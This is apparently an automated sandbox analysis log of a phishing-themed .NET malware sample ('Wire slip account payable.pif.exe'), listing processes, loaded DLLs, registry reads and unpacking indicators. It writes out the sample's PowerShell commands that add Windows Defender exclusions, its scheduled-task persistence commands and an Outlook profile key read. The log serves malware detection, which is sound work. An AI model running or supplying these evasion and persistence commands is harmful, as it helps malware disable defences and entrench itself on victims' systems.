Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process created: C:\Users\user\AppData\Roaming\EQVRGq.exe "C:\Users\user\AppData\Roaming\EQVRGq.exe"
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Wire slip account payable.pif.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EQVRGq.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp14C9.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Process created: C:\Users\user\Desktop\Wire slip account payable.pif.exe "C:\Users\user\Desktop\Wire slip account payable.pif.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp25B1.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process created: C:\Users\user\AppData\Roaming\EQVRGq.exe "C:\Users\user\AppData\Roaming\EQVRGq.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Process created: C:\Users\user\AppData\Roaming\EQVRGq.exe "C:\Users\user\AppData\Roaming\EQVRGq.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: Wire slip account payable.pif.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Wire slip account payable.pif.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, gL074BhmJSaIe9Ktd1.cs	.Net Code: zcNkPvRgVA System.Reflection.Assembly.Load(byte[])
Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, gL074BhmJSaIe9Ktd1.cs	.Net Code: zcNkPvRgVA System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 0_2_074976A0 push esp; ret	0_2_074976A1
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 0_2_074950B1 push EB900745h; ret	0_2_074950BD
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 0_2_07498DB0 push esp; iretd	0_2_07498DB9
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 8_2_011BFAD0 push esp; ret	8_2_011BFAF9
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 8_2_06940263 push esp; iretd	8_2_06940269
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 8_2_06949B53 push es; ret	8_2_06949B60
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 8_2_069498DB push 8B516C17h; iretd	8_2_069498E0
Source: C:\Users\user\Desktop\Wire slip account payable.pif.exe	Code function: 8_2_0694996B push 8B516C17h; iretd	8_2_06949974
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Code function: 9_2_06C146CC push es; retn 0006h	9_2_06C146DA
Source: C:\Users\user\AppData\Roaming\EQVRGq.exe	Code function: 9_2_06C176A0 push esp; ret	9_2_06C176A1
